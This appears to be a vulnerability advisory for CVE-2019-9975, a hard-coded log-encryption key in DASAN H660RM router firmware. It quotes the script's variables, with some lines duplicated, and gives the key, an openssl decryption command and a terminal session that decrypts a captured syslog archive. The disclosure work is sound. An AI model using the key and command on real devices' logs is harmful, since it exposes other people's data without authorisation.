DASAN H660RM devices with firmware 1.03-0022 (and possibly other) uses a hard-coded key “dasanektks123” for logs encryption. Data stored using this key can be decrypted by anyone able to access this key.
This vulnerability was assigned CVE-2019-9975.
CWE-321: Use of Hard-coded Cryptographic Key weakness exists in syslog_tool.cgi:
ENC_PASSWORD="dasanektks123"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d_%H_%M_%S`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d_%H_%M_%S`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"
Script syslog_tool.cgi uses OpenSSL’s aes-128-cbc encryption. Logs can be decrypted with command:
openssl enc -aes-128-cbc -d -k dasanektks123 -in encrypted.tar.gz -out cleartext.tar.gz
Decryption of logs follows.
kali ~/Downloads $ la total 136K drwxr-xr-x 2 user user 4.0K Mar 8 21:41 ./ drwx------ 23 user user 4.0K Mar 8 21:41 ../ -rw-r--r-- 1 user user 127K Mar 8 20:12 syslog_1970_01_01_00_18_49.tar.gz kali ~/Downloads $ file * syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password kali ~/Downloads $ openssl enc -aes-128-cbc -d -k dasanektks123 -in syslog_1970_01_01_00_18_49.tar.gz -out cleartext-syslog_1970_01_01_00_18_49.tar.gz *** WARNING : deprecated key derivation used. Using -iter or -pbkdf2 would be better. kali ~/Downloads $ file * cleartext-syslog_1970_01_01_00_18_49.tar.gz: gzip compressed data, max compression, from Unix, original size 735232 syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password kali ~/Downloads $ tar xvf cleartext-syslog_1970_01_01_00_18_49.tar.gz data/log/ data/log/messages kali ~/Downloads $ head data/log/messages === [REBOOT REASON] ============================== POWERBOOT_BY_LOCAL e30ef88d === [LOG - BEGIN] ============================ === [LOG - END] ============================== Jan 1 00:01:08 kernel: klogd started: BusyBox v1.00 (2017.11.10-07:25+0000) Jan 1 00:01:08 kernel: Error! phy_I2C_read return value = 0 Jan 1 00:01:08 kernel: u1DevAddr:0x51, u4WordAddr:0x70 Jan 1 00:01:08 kernel: _SIF_DrvRawRead:^M Jan 1 00:01:08 kernel: Error sub-addr! Jan 1 00:01:08 kernel: Error! phy_I2C_read return value = 0